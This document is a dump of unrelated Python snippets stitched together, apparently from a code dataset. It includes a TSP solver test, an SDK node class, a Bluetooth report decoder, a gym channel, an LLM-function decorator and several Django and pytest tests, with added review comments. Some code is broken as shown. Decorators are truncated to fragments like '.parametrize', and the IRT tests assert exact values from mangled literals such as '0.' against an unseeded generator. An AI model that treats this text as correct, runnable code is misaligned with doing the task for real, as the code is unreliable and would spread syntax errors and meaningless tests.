code stringlengths 281 23.7M |
|---|
# NOTE(review): the decorator below lost its "@pytest.mark" prefix in this dump —
# presumably "@pytest.mark.parametrize(...)"; restore before running.
.parametrize('distance_matrix, expected_distance', [(distance_matrix1, optimal_distance1), (distance_matrix2, optimal_distance2), (distance_matrix3, optimal_distance3)])
def test_solution_is_optimal(distance_matrix, expected_distance):
    """Branch-and-bound TSP solver returns the known optimal tour length for each fixture."""
    # The solver returns (permutation, distance); only the distance is checked here.
    (_, distance) = solve_tsp_branch_and_bound(distance_matrix)
    assert (distance == expected_distance)
class CO2eqParametersLifecycle(BaseClasses.CO2eqParametersDirectAndLifecycleBase):
    """Lifecycle CO2-equivalent parameter set with a plausibility range per production mode."""

    # Parsed lifecycle emission-factor parameters (constant defined elsewhere in the module).
    parameters = CO2EQ_PARAMETERS_LIFECYCLE
    # Mode name -> allowed (min, max) value range, presumably gCO2eq/kWh — TODO confirm units.
    ranges_by_mode: dict[(str, tuple[((int | float), (int | float))])] = {'oil': (600, 1600), 'coal': (500, 1600), 'gas': (400, 900), 'geothermal': (30, 199), 'hydro': (10, 25), 'nuclear': (4, 12), 'biomass': (0.4, 1300), 'solar': (25, 45), 'wind': (10, 13), 'battery charge': (0, 0), 'hydro charge': (0, 0), 'battery discharge': (10, 1200), 'hydro discharge': (10, 1200), 'unknown': (10, 1000)}
# NOTE(review): the decorator below lost its "@pytest.mark" prefix in this dump.
.parametrize('method,expected', (('test_endpoint', 'value-a'), ('not_implemented', NotImplementedError)))
def test_fixture_middleware(w3, method, expected):
    """Fixture middleware answers its configured method and raises for unknown methods."""
    w3.middleware_onion.add(construct_fixture_middleware({'test_endpoint': 'value-a'}))
    if (isinstance(expected, type) and issubclass(expected, Exception)):
        # When the expected value is an exception class, the request must raise it.
        with pytest.raises(expected):
            w3.manager.request_blocking(method, [])
    else:
        actual = w3.manager.request_blocking(method, [])
        assert (actual == expected)
class PageAboutStory(AbstractCrudObject):
    """Graph API node wrapper for a Page "About" story (auto-generated SDK-style class)."""

    def __init__(self, fbid=None, parent_id=None, api=None):
        # Marker attribute used by the SDK to identify this node type.
        self._isPageAboutStory = True
        super(PageAboutStory, self).__init__(fbid, parent_id, api)

    class Field(AbstractObject.Field):
        # Graph API field names exposed by this node.
        composed_text = 'composed_text'
        cover_photo = 'cover_photo'
        entity_map = 'entity_map'
        id = 'id'
        is_published = 'is_published'
        page_id = 'page_id'
        title = 'title'

    def api_get(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
        """Issue (or batch/defer) a GET on this node.

        Returns the FacebookRequest when batched or pending, otherwise the
        executed request's result.
        """
        from facebook_business.utils import api_utils
        if ((batch is None) and ((success is not None) or (failure is not None))):
            # Callbacks are only honored by batched calls; warn instead of silently ignoring them.
            api_utils.warning('`success` and `failure` callback only work for batch call.')
        param_types = {}
        enums = {}
        request = FacebookRequest(node_id=self['id'], method='GET', endpoint='/', api=self._api, param_checker=TypeChecker(param_types, enums), target_class=PageAboutStory, api_type='NODE', response_parser=ObjectParser(reuse_object=self))
        request.add_params(params)
        request.add_fields(fields)
        if (batch is not None):
            request.add_to_batch(batch, success=success, failure=failure)
            return request
        elif pending:
            # Caller will execute the request later.
            return request
        else:
            self.assure_call()
            return request.execute()

    # Graph API field name -> SDK type string, consumed by the generated type checker.
    _field_types = {'composed_text': 'list<PageAboutStoryComposedBlock>', 'cover_photo': 'Photo', 'entity_map': 'list<Object>', 'id': 'string', 'is_published': 'bool', 'page_id': 'string', 'title': 'string'}

    # NOTE(review): upstream SDK code declares this as a @classmethod; the decorator
    # appears stripped in this dump — confirm before relying on instance calls.
    def _get_field_enum_info(cls):
        field_enum_info = {}
        return field_enum_info
# NOTE(review): the decorator below lost its "@pytest.mark" prefix in this dump.
.parametrize(('input_data', 'expected'), [({}, {}), ({2016: {1: 1, 4: 4}}, {2016: {1: 1, 2: 0, 3: 0, 4: 4}}), ({2000: {12: 1}, 2001: {2: 1}}, {2000: {12: 1}, 2001: {1: 0, 2: 1}}), ({2000: {11: 1}, 2001: {1: 1}}, {2000: {11: 1, 12: 0}, 2001: {1: 1}})])
def test_fill_in_time_gaps(input_data, expected):
    """_fill_in_time_gaps mutates its argument in place, zero-filling missing months."""
    _fill_in_time_gaps(input_data)
    # The function returns nothing; the mutation itself is the contract under test.
    assert (input_data == expected)
def merge_neighbors_loose_p_value(pLoosePValue, pData, pViewpointObj, pResolution, pTruncateZeroPvalues):
    """Filter interactions by a loose p-value threshold, then merge neighboring bins.

    Parameters
    ----------
    pLoosePValue : float or dict
        Global threshold, or per-key thresholds keyed like ``pData[0]``.
    pData : tuple(dict, dict)
        ``pData[0]`` maps key -> record whose index 1 holds the p-value;
        ``pData[1]`` maps key -> the associated raw line.
    pViewpointObj : object
        Must provide ``merge_neighbors(lines, pMergeThreshold=...)``; only used
        when at least one record passes the filter.
    pResolution : int
        Merge threshold forwarded to ``merge_neighbors``.
    pTruncateZeroPvalues : bool
        If True, records with a p-value of exactly 0 are rejected as well.

    Returns
    -------
    tuple
        The ``merge_neighbors`` result for the accepted lines, or
        ``({}, None)`` when nothing passes the filter.
    """
    # Unify the float/dict threshold handling that was previously duplicated
    # across two nearly identical loops.
    if isinstance(pLoosePValue, float):
        def threshold(_key):
            return pLoosePValue
    elif isinstance(pLoosePValue, dict):
        def threshold(key):
            return pLoosePValue[key]
    else:
        # Unsupported threshold type: nothing is accepted (matches original behavior,
        # which skipped both branches and returned the empty result).
        return ({}, None)
    accepted_line = {}
    for key, record in pData[0].items():
        p_value = record[1]
        if pTruncateZeroPvalues and (p_value == 0):
            # Zero p-values are treated as artifacts and discarded on request.
            continue
        if (p_value > threshold(key)):
            continue
        accepted_line[key] = pData[1][key]
    if accepted_line:
        return pViewpointObj.merge_neighbors(accepted_line, pMergeThreshold=pResolution)
    return (accepted_line, None)
def _check_updates_dom0():
    """Check whether dom0 has pending updates.

    Runs ``qubes-dom0-update --check-only`` under sudo; a non-zero exit code is
    treated as "updates required (or check failed)".
    """
    check_cmd = ['sudo', 'qubes-dom0-update', '--check-only']
    try:
        subprocess.check_call(check_cmd)
    except subprocess.CalledProcessError as err:
        # Either updates are pending or the check itself failed; both are
        # reported as requiring updates.
        sdlog.error('dom0 updates required, or cannot check for updates')
        sdlog.error(str(err))
        return UpdateStatus.UPDATES_REQUIRED
    else:
        sdlog.info('No updates available for dom0')
        return UpdateStatus.UPDATES_OK
class WidgetEventFilter(QtCore.QObject):
    """Qt event filter that keeps a wrapper's ``visible`` attribute in sync with show/hide."""

    def __init__(self, widget):
        QtCore.QObject.__init__(self)
        # The wrapped widget object whose ``control`` (a Qt widget) is observed.
        self._widget = widget

    def eventFilter(self, obj, event):
        """Mirror Show/Hide events onto ``widget.visible``; never consumes events."""
        widget = self._widget
        if (obj is not widget.control):
            return False
        event_type = event.type()
        if (event_type in {QtCore.QEvent.Type.Show, QtCore.QEvent.Type.Hide}):
            # isHidden() reflects the final state regardless of which event fired.
            widget.visible = (not widget.control.isHidden())
        return False
def test_remote_set_signal(remote):
    """set_signal builds a request carrying the signal id and scalar integer value."""
    mock_client = MagicMock()
    def checker(request):
        # Inspect the request object handed to the mocked client.
        assert (request.id.signal_id == 'sigid')
        assert (request.value.scalar.primitive.integer == 3)
    mock_client.set_signal.side_effect = checker
    # Swap in the mock so no real client call is made.
    remote._client = mock_client
    remote.set_signal('sigid', 'execid', 3)
def render_template(input_files, template_file, output_file):
    """Render a template to ``output_file`` using data loaded from ``input_files``.

    A single non-empty string is treated as one input file. The default GEN_KW
    export JSON is prepended to the input list when it exists on disk.
    """
    if (isinstance(input_files, str) and input_files):
        input_files = (input_files,)
    all_input_files = ()
    gen_kw_export_path = (DEFAULT_GEN_KW_EXPORT_NAME + '.json')
    if os.path.isfile(gen_kw_export_path):
        all_input_files += (gen_kw_export_path,)
    if input_files:
        all_input_files += tuple(input_files)
    # Project helper: validates inputs before any rendering work.
    _assert_input(all_input_files, template_file, output_file)
    template = _load_template(template_file)
    data = _load_input(all_input_files)
    with open(output_file, 'w', encoding='utf-8') as fout:
        # Presumably a jinja-style template — the data dict is splatted as keywords.
        fout.write(template.render(**data))
class aifunc():
    """Decorator class turning a plain Python function into an LLM-executed function.

    Calling the decorated function builds an agent from the function's signature
    and docstring prompt, optionally runs analyzer/collector agents over the
    configured tools, and parses the LLM response as the return value.
    """

    # Class-level defaults used when a call site passes neither model nor provider.
    model = None
    embedding_provider = None

    def __init__(self, tools: List = None):
        """Store the tool list for this decorator instance.

        FIX: the previous mutable default argument (``tools: List=[]``) shared
        one list across every ``aifunc()`` instance; use a None sentinel instead.
        """
        self.tools = tools if tools is not None else []

    def __call__(self, func):
        # NOTE(review): the original contained a bare no-op statement ``(func)``
        # here — presumably a stripped ``@functools.wraps(func)``; removed.
        def inner(*args, model=None, embedding_provider=None, **kwargs):
            sig = inspect.signature(func)
            # Per-call overrides fall back to the class-level defaults.
            agent_kwargs = {'model': (model or aifunc.model), 'embedding_provider': (embedding_provider or aifunc.embedding_provider)}
            agent = kwargs.pop('agent', loopgpt.agent.ACTIVE_AGENT)
            if (agent is None):
                agent = empty_agent(**agent_kwargs)
            agent.name = func.__name__
            func_prompt = get_func_prompt(func, sig)
            agent.description = func_prompt
            if ((len(args) == 0) and (len(kwargs) == 0)):
                args_str = 'Arguments:\n\nThis function does not take any arguments.'
            else:
                args_str = get_args_prompt(sig, args, kwargs)
            if self.tools:
                # Tool mode: a collector agent gathers data via tool calls while
                # an analyzer decides whether more data is required.
                analyzer = create_analyzer_agent(func_prompt, self.tools, args_str, **agent_kwargs)
                collector = create_data_collector_agent(func_prompt, self.tools, args_str, **agent_kwargs)
                analyzer.memory = agent.memory
                collector.memory = agent.memory
                commands = collector.chat(response_callback=collector_response_callback)
                req_data = True
                while (commands and req_data):
                    command = commands[0]
                    if (command['function'] == func.__name__):
                        # The collector must not recursively invoke the target function.
                        commands.pop(0)
                        continue
                    tool = collector.tools[command['function']]
                    resp = str(tool.run(**command['args']))
                    last_command = str([{'function': command['function'], 'args': command['args'], 'response': resp}])
                    msg = {'role': 'system', 'content': f"You executed {command['function']} with {command['args']} and got the response: {resp}."}
                    collector.history.append(msg)
                    analyzer.history.append(msg)
                    if ((len(commands) > 1) and ('<' in str(commands[1]['args']))):
                        # '<placeholder>' args in the next command are filled from
                        # the command that just ran.
                        new_commands = expand_placeholders(commands, last_command)
                        if new_commands:
                            commands = new_commands
                    commands.pop(0)
                    if (len(commands) == 0):
                        req_data = analyzer.chat(response_callback=None)
                        if (req_data == 'yes'):
                            commands = collector.chat(response_callback=collector_response_callback)
            resp = agent.chat((args_str + 'Respond only with your return value. Your response is to be directly parsed, strictly do not include any other text in your response.'), response_callback=None)
            resp = main_response_callback(resp, sig.return_annotation)
            return resp
        return inner
class TestMMLEAPMethods(unittest.TestCase):
    """Regression tests for marginal-maximum-likelihood EAP estimation methods.

    NOTE(review): ``np.random.default_rng()`` is created without a seed, yet the
    tests assert exact expected arrays — presumably the upstream source seeds the
    generator and the seed was lost in this dump; confirm before running.
    """

    def test_2pl_mml_eap_method(self):
        """2PL MML/EAP recovery on small synthetic dichotomous data."""
        rng = np.random.default_rng()
        n_items = 5
        n_people = 150
        difficulty = rng.standard_normal(n_items)
        discrimination = (rng.rayleigh(scale=0.8, size=n_items) + 0.25)
        thetas = rng.standard_normal(n_people)
        syn_data = create_synthetic_irt_dichotomous(difficulty, discrimination, thetas, seed=rng)
        result = twopl_mml_eap(syn_data, {'hyper_quadrature_n': 21})
        expected_difficulty = np.array([(- 2.), 0., 0., 0., (- 0.)])
        expected_discrimination = np.array([1., 1., 1., 0., 1.])
        expected_rayleigh_scale = 0.
        np.testing.assert_allclose(result['Difficulty'], expected_difficulty, atol=0.001, rtol=0.001)
        np.testing.assert_allclose(result['Discrimination'], expected_discrimination, atol=0.001, rtol=0.001)
        self.assertAlmostEqual(result['Rayleigh_Scale'], expected_rayleigh_scale, 3)

    def test_2pl_mml_eap_method_csirt(self):
        """2PL MML/EAP with latent-distribution estimation enabled."""
        rng = np.random.default_rng()
        n_items = 10
        n_people = 300
        difficulty = rng.standard_normal(n_items)
        discrimination = (rng.rayleigh(scale=0.8, size=n_items) + 0.25)
        thetas = rng.standard_normal(n_people)
        syn_data = create_synthetic_irt_dichotomous(difficulty, discrimination, thetas, seed=rng)
        result = twopl_mml_eap(syn_data, {'estimate_distribution': True})
        expected_difficulty = np.array([2., 0., 1., (- 0.), 0., 1.2814035, (- 1.), 0., 1., (- 2.)])
        expected_discrimination = np.array([1., 1., 0., 0., 1., 1., 0., 0., 0., 0.])
        expected_rayleigh_scale = 0.
        np.testing.assert_allclose(result['Difficulty'], expected_difficulty, atol=0.001, rtol=0.001)
        np.testing.assert_allclose(result['Discrimination'], expected_discrimination, atol=0.001, rtol=0.001)
        self.assertAlmostEqual(result['Rayleigh_Scale'], expected_rayleigh_scale, 3)

    def test_grm_mml_eap_method(self):
        """Graded-response-model MML/EAP recovery on synthetic polytomous data."""
        rng = np.random.default_rng()
        n_items = 10
        n_people = 300
        difficulty = rng.standard_normal((n_items, 3))
        # GRM thresholds must be ordered within each item.
        difficulty = np.sort(difficulty, axis=1)
        discrimination = (rng.rayleigh(scale=0.8, size=n_items) + 0.25)
        thetas = rng.standard_normal(n_people)
        syn_data = create_synthetic_irt_polytomous(difficulty, discrimination, thetas, seed=rng)
        result = grm_mml_eap(syn_data, {'hyper_quadrature_n': 21})
        expected_difficulty = np.array([[(- 0.), (- 0.0676688), 1.], [0., 2., 2.], [(- 0.), 0., 1.], [(- 0.), (- 0.2025803), 0.], [0., 1., 1.], [(- 0.), (- 0.), 0.], [(- 1.), (- 0.), 1.], [0., 0., 0.], [(- 0.), 0., 1.1572905], [(- 0.), (- 0.), 0.]])
        expected_discrimination = np.array([1., 0.9014368, 1., 1., 1., 1., 1., 0., 1., 1.])
        expected_rayleigh_scale = 0.
        np.testing.assert_allclose(result['Difficulty'], expected_difficulty, atol=0.001, rtol=0.001)
        np.testing.assert_allclose(result['Discrimination'], expected_discrimination, atol=0.001, rtol=0.001)
        self.assertAlmostEqual(result['Rayleigh_Scale'], expected_rayleigh_scale, 3)
# NOTE(review): decorator lost its "@pytest.mark" prefix in this dump — presumably
# "@pytest.mark.django_db".
.django_db
def test_match_from_component_both_filters(client, monkeypatch, elasticsearch_award_index, subaward_with_tas):
    """Subaward search matches when both the require-filter and the TAS component agree."""
    _setup_es(client, monkeypatch, elasticsearch_award_index)
    resp = query_by_treasury_account_components_subaward(client, {'require': [_agency_path(BASIC_TAS)]}, [component_dictionary(BASIC_TAS)])
    assert (resp.json()['results'] == [_subaward1()])
def displayCode(dom, element):
    """Copy the code found under *element* into its paired display target, HTML-escaped.

    Relies on a fixed sibling/child DOM layout around *element*;
    ``getOrGenerateId``/``getElement`` are JS helpers evaluated in the page context.
    """
    # Source node: second child of the element (firstElementChild's next sibling).
    source = dom.executeString(f"getOrGenerateId(getElement('{element}').firstElementChild.nextElementSibling);")
    code = clean(dom.getValue(source))
    # Target node: located by walking a fixed DOM path relative to the source node —
    # fragile if the page structure changes.
    target = dom.executeString(f"getOrGenerateId(getElement('{source}').nextElementSibling.nextElementSibling.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling);")
    dom.setValue(target, html.escape(code))
class HCI_LEM_Ext_Adv_Report(Packet):
    """Decoder for a BLE HCI LE Extended Advertising Report event."""

    def __init__(self):
        self.name = 'Ext Adv Report'
        # Fixed-layout header fields, in wire order; the trailing 'data len' field
        # gives the length of the AD structures that follow.
        self.payload = [BitFieldByte('ev type', 0, ['Connectable', 'Scannable', 'Directed', 'Scan Response', 'Legacy', 'Incomplete/more', 'Incomplete/truncated', 'RFU']), UIntByte('unused'), EnumByte('addr type', 0, {0: 'public device', 1: 'random device', 2: 'public identity', 3: 'random identity', 255: 'anonymous'}), MACAddr('peer'), EnumByte('primary phy', 1, {1: 'LE 1M', 3: 'LE Coded'}), EnumByte('secondary phy', 0, {0: 'N/A', 1: 'LE 1M', 2: 'LE 2M', 3: 'LE Coded'}), EnumByte('adv sid', 255, {0: '0x00', 1: '0x01', 2: '0x02', 3: '0x03', 4: '0x04', 5: '0x05', 6: '0x06', 7: '0x07', 8: '0x08', 9: '0x09', 10: '0x0A', 11: '0x0B', 12: '0x0C', 13: '0x0D', 14: '0x0E', 15: '0x0F', 255: 'N/A'}), IntByte('tx power'), IntByte('rssi'), UShortInt('adv interval', endian='little'), EnumByte('direct addr type', 0, {0: 'public device', 1: 'random device', 2: 'public identity', 3: 'random identity', 254: 'random device'}), MACAddr('direct addr'), UIntByte('data len')]

    def decode(self, data):
        """Decode the header fields, then consume AD structures until 'data len' is exhausted.

        Returns the remaining undecoded bytes.
        """
        for x in self.payload:
            data = x.decode(data)
        # Last header field is 'data len': total length of the AD structures.
        datalength = self.payload[(- 1)].val
        while (datalength > 0):
            ad = AD_Structure()
            data = ad.decode(data)
            # Decoded AD structures are appended to payload so show() prints them too.
            self.payload.append(ad)
            datalength -= len(ad)
        return data

    def show(self, depth=0):
        """Pretty-print the report name and every decoded field, indented by depth."""
        print('{}{}:'.format((PRINT_INDENT * depth), self.name))
        for x in self.payload:
            x.show((depth + 1))
class GymChannel():
    """Bridges AEA envelopes to a wrapped ``gym.Env``.

    Blocking gym calls (step/reset/close) are executed on a small thread pool so
    the event loop is not blocked; responses are queued as outgoing envelopes.
    """

    THREAD_POOL_SIZE = 3

    def __init__(self, address: Address, gym_env: gym.Env):
        self.address = address
        self.gym_env = gym_env
        self._loop: Optional[AbstractEventLoop] = None
        self._queue: Optional[asyncio.Queue] = None
        self._threaded_pool: ThreadPoolExecutor = ThreadPoolExecutor(self.THREAD_POOL_SIZE)
        self.logger: Union[(logging.Logger, logging.LoggerAdapter)] = _default_logger
        self._dialogues = GymDialogues()

    def _get_message_and_dialogue(self, envelope: Envelope) -> Tuple[(GymMessage, Optional[GymDialogue])]:
        """Extract the GymMessage and its (possibly None) dialogue from an envelope."""
        message = cast(GymMessage, envelope.message)
        dialogue = cast(GymDialogue, self._dialogues.update(message))
        return (message, dialogue)

    @property
    def queue(self) -> asyncio.Queue:
        """The outgoing envelope queue; raises ValueError before connect().

        FIX: restored the @property decorator — ``_send``/``get`` access this as
        ``self.queue.put(...)``/``self.queue.get()``, which fails with an
        AttributeError if ``queue`` is a plain method.
        """
        if (self._queue is None):
            raise ValueError('Channel is not connected')
        return self._queue

    async def connect(self) -> None:
        """Idempotently capture the running loop and create the outgoing queue."""
        if self._queue:
            return None
        self._loop = asyncio.get_event_loop()
        self._queue = asyncio.Queue()

    async def send(self, envelope: Envelope) -> None:
        """Validate the envelope's protocol and dispatch it to the gym handler."""
        sender = envelope.sender
        self.logger.debug('Processing message from {}: {}'.format(sender, envelope))
        if (envelope.protocol_specification_id != GymMessage.protocol_specification_id):
            raise ValueError('This protocol is not valid for gym.')
        (await self.handle_gym_message(envelope))

    async def _run_in_executor(self, fn: Callable, *args: Any) -> Tuple[(Any, float, bool, Dict)]:
        """Run a blocking gym call on the thread pool; raises if connect() never ran."""
        if (self._loop is None):
            raise ValueError('Loop not set!')
        return (await self._loop.run_in_executor(self._threaded_pool, fn, *args))

    async def handle_gym_message(self, envelope: Envelope) -> None:
        """Translate an ACT/RESET/CLOSE message into the matching gym call and reply."""
        enforce(isinstance(envelope.message, GymMessage), 'Message not of type GymMessage')
        (gym_message, dialogue) = self._get_message_and_dialogue(envelope)
        if (dialogue is None):
            self.logger.warning('Could not create dialogue from message={}'.format(gym_message))
            return
        if (gym_message.performative == GymMessage.Performative.ACT):
            action = gym_message.action.any
            step_id = gym_message.step_id
            (observation, reward, done, info) = (await self._run_in_executor(self.gym_env.step, action))
            msg = dialogue.reply(performative=GymMessage.Performative.PERCEPT, target_message=gym_message, observation=GymMessage.AnyObject(observation), reward=reward, done=done, info=GymMessage.AnyObject(info), step_id=step_id)
        elif (gym_message.performative == GymMessage.Performative.RESET):
            (await self._run_in_executor(self.gym_env.reset))
            msg = dialogue.reply(performative=GymMessage.Performative.STATUS, target_message=gym_message, content={'reset': 'success'})
        elif (gym_message.performative == GymMessage.Performative.CLOSE):
            # close() produces no reply envelope.
            (await self._run_in_executor(self.gym_env.close))
            return
        # NOTE(review): any other performative would leave `msg` unbound here —
        # presumably the dialogue layer guarantees only ACT/RESET/CLOSE arrive; confirm.
        envelope = Envelope(to=msg.to, sender=msg.sender, message=msg)
        (await self._send(envelope))

    async def _send(self, envelope: Envelope) -> None:
        """Enqueue an outgoing envelope."""
        (await self.queue.put(envelope))

    async def disconnect(self) -> None:
        """Signal consumers with a None sentinel and drop the queue."""
        if (self._queue is not None):
            (await self._queue.put(None))
            self._queue = None

    async def get(self) -> Optional[Envelope]:
        """Await the next outgoing envelope (None means disconnected)."""
        return (await self.queue.get())
def test_numpy_ufunc():
    """Fxp fixed-point arrays should track numpy ufunc results on matching data.

    ``ufunc(f...)()`` — the trailing call — presumably extracts the Fxp value as
    an ndarray for comparison; confirm against the Fxp API.
    """
    vx = [(- 1.0), 0.0, 1.0]
    vy = [1.0, 2.0, 4.0]
    vc = [(1j * 0.5), (1.5 + (1j * 2.0)), ((- 0.5) + (1j * 0))]
    nx = np.asarray(vx)
    ny = np.asarray(vy)
    nc = np.asarray(vc)
    # Very wide fixed-point formats so results match floating point exactly.
    fx = Fxp(vx, True, (16 * 8), (8 * 8))
    fy = Fxp(vy, True, (12 * 8), (4 * 8))
    fc = Fxp(vc, True, (12 * 8), (4 * 8))
    c = 2.0
    # Unary ufuncs over signed/positive/complex inputs.
    ufunc_one_param_list = [np.positive, np.negative, np.conj, np.exp, np.abs, np.sin]
    for ufunc in ufunc_one_param_list:
        assert (ufunc(nx) == ufunc(fx)()).all()
        assert (ufunc(ny) == ufunc(fy)()).all()
        assert (ufunc(nc) == ufunc(fc)()).all()
    # Ufuncs requiring positive inputs are compared within the Fxp precision.
    ufunc_one_positive_param_list = [np.log, np.log10, np.sqrt]
    for ufunc in ufunc_one_positive_param_list:
        assert np.allclose(ufunc(ny), ufunc(fy)(), rtol=fy.precision)
    # Binary ufuncs: scalar and array operands, mixed Fxp/ndarray combinations.
    ufunc_two_params_list = [np.add, np.subtract, np.multiply, np.divide]
    for ufunc in ufunc_two_params_list:
        assert (ufunc(nx, c) == ufunc(fx, c)()).all()
        assert (ufunc(ny, c) == ufunc(fy, c)()).all()
        assert (ufunc(nx, ny) == ufunc(fx, fy)()).all()
        assert (ufunc(nx, ny) == ufunc(nx, fy)()).all()
        assert (ufunc(nx, ny) == ufunc(fx, ny)()).all()
    # Array-product ufuncs (1-D matmul == dot product here).
    ufunc_two_array_params_list = [np.matmul]
    for ufunc in ufunc_two_array_params_list:
        assert (ufunc(nx, ny) == ufunc(fx, fy)()).all()
        assert (ufunc(nx, ny) == ufunc(nx, fy)()).all()
        assert (ufunc(nx, ny) == ufunc(fx, ny)()).all()
class Position(DocType):
    """Elasticsearch document for a trading position on a security."""

    # Mapping fields (Elasticsearch DSL field declarations).
    securityId = Keyword()
    longAmount = Long()
    availableLong = Long()
    averageLongPrice = Long()
    shortAmount = Long()
    availableShort = Long()
    averageShortPrice = Long()
    value = Float()
    # T+n trading rule indicator — presumably 0 for T+0, 1 for T+1; confirm.
    tradingT = Short()

    def __init__(self, meta=None, security_id=None, trading_t=1, **kwargs):
        super().__init__(meta, **kwargs)
        self.securityId = security_id
        self.longAmount = 0
        self.availableLong = 0
        self.shortAmount = 0
        self.availableShort = 0
        # NOTE(review): `profit` is set here but has no mapping field declared
        # above — confirm whether it is meant to be persisted.
        self.profit = 0
        self.value = 0
        self.tradingT = trading_t
# NOTE(review): the decorator below lost its "@mock.patch" (or similar) prefix in
# this dump — only the patch target string remains; restore before running.
('flytekit.remote.remote_callable.create_and_link_node_from_remote')
def test_lazy_loading_compile(create_and_link_node_from_remote_mock):
    """LazyEntity resolves its getter exactly once, on first compile."""
    once = True
    def _getter():
        nonlocal once
        if (not once):
            # Guard: a second invocation means the entity was not cached.
            raise ValueError('Should be called once only')
        once = False
        return dummy_task
    e = LazyEntity('x', _getter)
    assert (e.name == 'x')
    # Entity is not materialized until compile() is called.
    assert (e._entity is None)
    ctx = context_manager.FlyteContext.current_context()
    e.compile(ctx)
    assert (e._entity is not None)
    assert (e.entity == dummy_task)
class OfflineMessageTableStrategy(GasStrategy):
    """Gas strategy based on a static per-message-type lookup table (no node queries)."""

    DEFAULT_FALLBACK_GAS_LIMIT = 400000
    DEFAULT_BLOCK_LIMIT = 2000000

    @staticmethod
    def default_table() -> 'OfflineMessageTableStrategy':
        """Build a strategy pre-populated with common Cosmos/CosmWasm message costs.

        FIX: marked @staticmethod — the function takes no self/cls, and without
        the decorator it could not be called on an instance.
        """
        strategy = OfflineMessageTableStrategy()
        strategy.update_entry('cosmos.bank.v1beta1.MsgSend', 100000)
        strategy.update_entry('cosmwasm.wasm.v1.MsgStoreCode', 2000000)
        strategy.update_entry('cosmwasm.wasm.v1.MsgInstantiateContract', 250000)
        strategy.update_entry('cosmwasm.wasm.v1.MsgExecuteContract', 400000)
        return strategy

    def __init__(self, fallback_gas_limit: Optional[int]=None, block_limit: Optional[int]=None):
        """Create an empty table with optional fallback/block limit overrides."""
        self._table: Dict[(str, int)] = {}
        self._block_limit = (block_limit or self.DEFAULT_BLOCK_LIMIT)
        self._fallback_gas_limit = (fallback_gas_limit or self.DEFAULT_FALLBACK_GAS_LIMIT)

    def update_entry(self, transaction_type: str, gas_limit: int):
        """Set or replace the gas cost for a fully-qualified message type name."""
        self._table[str(transaction_type)] = int(gas_limit)

    def estimate_gas(self, tx: Transaction) -> int:
        """Sum per-message table costs (fallback for unknown types), clipped to the block limit."""
        gas_estimate = 0
        for msg in tx.msgs:
            gas_estimate += self._table.get(msg.DESCRIPTOR.full_name, self._fallback_gas_limit)
        # NOTE(review): _clip_gas is not defined in this class — presumably
        # provided by the GasStrategy base; confirm.
        return self._clip_gas(gas_estimate)

    def block_gas_limit(self) -> int:
        """Maximum gas allowed per block for clipping estimates."""
        return self._block_limit
def test_main():
    """CLI run of hicCreateThresholdFile should reproduce the reference threshold file."""
    # delete=True: the temp file is cleaned up when the object is garbage-collected/closed.
    outfile = NamedTemporaryFile(suffix='.txt', delete=True)
    args = '--range {} {} -tv {} -o {}'.format(200000, 200000, 0.5, outfile.name).split()
    hicCreateThresholdFile.main(args)
    # delta=1 tolerates minor numeric formatting differences between runs.
    assert are_files_equal((ROOT + 'hicCreateThresholdFile/thresholdFile_loose_pValue.txt'), outfile.name, delta=1)
# NOTE(review): the route decorator lost its "@" prefix in this dump — presumably
# "@_router.get(...)"; restore before running.
_router.get('/item/', response_model=CollectionItemListResponse, dependencies=PERMISSIONS_READ)
def item_list(queryset: CollectionItemQuerySet=Depends(get_item_queryset), stoken: t.Optional[str]=None, limit: int=50, prefetch: Prefetch=PrefetchQuery, withCollection: bool=False, user: UserType=Depends(get_authenticated_user)):
    """List collection items for the authenticated user.

    Unless ``withCollection`` is set, only top-level items (no parent) are returned.
    """
    if (not withCollection):
        queryset = queryset.filter(parent__isnull=True)
    response = item_list_common(queryset, user, stoken, limit, prefetch)
    return response
# NOTE(review): decorator lost its "@pytest.mark" prefix in this dump — presumably
# "@pytest.mark.django_db".
.django_db
def test_remove_empty_federal_accounts():
    """Federal accounts without any linked treasury account should be deleted."""
    baker.make(FederalAccount, pk=1, agency_identifier='ab1', main_account_code='0987')
    baker.make(FederalAccount, pk=2, agency_identifier='ab2', main_account_code='0987')
    baker.make(FederalAccount, pk=4, agency_identifier='ab4', main_account_code='0987')
    baker.make(FederalAccount, pk=5, agency_identifier='ab5', main_account_code='0987')
    baker.make(FederalAccount, pk=6, agency_identifier='ab6', main_account_code='0987')
    # Only federal accounts 1 and 2 get treasury accounts (the second via agency_id match).
    baker.make(TreasuryAppropriationAccount, pk=1, agency_id='ab1', main_account_code='0987', federal_account_id=1)
    baker.make(TreasuryAppropriationAccount, pk=2, agency_id='ab2', main_account_code='0987')
    assert (FederalAccount.objects.count() == 5)
    remove_empty_federal_accounts()
    # Accounts 4, 5, 6 have no treasury accounts and must be removed.
    assert (FederalAccount.objects.count() == 2)
class TestTupleIndexManager(IndexManagerMixin, TestCase):
    """Tests for TupleIndexManager: sequence <-> index round-trips and identity caching."""

    def setUp(self):
        super().setUp()
        self.index_manager = TupleIndexManager()

    def tearDown(self):
        self.index_manager.reset()

    def test_complex_sequence_round_trip(self):
        """A sequence converts to an index and back unchanged."""
        sequence = (5, 6, 7, 8, 9, 10)
        index = self.index_manager.from_sequence(sequence)
        result = self.index_manager.to_sequence(index)
        self.assertEqual(result, sequence)

    def test_complex_sequence_identical_index(self):
        """Equal (but distinct) sequences map to the identical cached index object."""
        sequence = (5, 6, 7, 8, 9, 10)
        index_1 = self.index_manager.from_sequence(sequence[:])
        index_2 = self.index_manager.from_sequence(sequence[:])
        self.assertIs(index_1, index_2)

    def test_complex_sequence_to_parent_row(self):
        """The last element is the row; the prefix identifies the parent index."""
        sequence = (5, 6, 7, 8, 9, 10)
        index = self.index_manager.from_sequence(sequence)
        (parent, row) = self.index_manager.get_parent_and_row(index)
        self.assertEqual(row, 10)
        self.assertIs(parent, self.index_manager.from_sequence((5, 6, 7, 8, 9)))

    def test_complex_index_round_trip(self):
        """create_index/get_parent_and_row are inverses at every depth."""
        sequence = (5, 6, 7, 8, 9, 10)
        parent = Root
        for (depth, row) in enumerate(sequence):
            with self.subTest(depth=depth):
                index = self.index_manager.create_index(parent, row)
                result = self.index_manager.get_parent_and_row(index)
                self.assertIs(result[0], parent)
                self.assertEqual(result[1], row)
                parent = index

    def test_complex_index_create_index_identical(self):
        """create_index returns the identical cached object for repeated calls."""
        sequence = (5, 6, 7, 8, 9, 10)
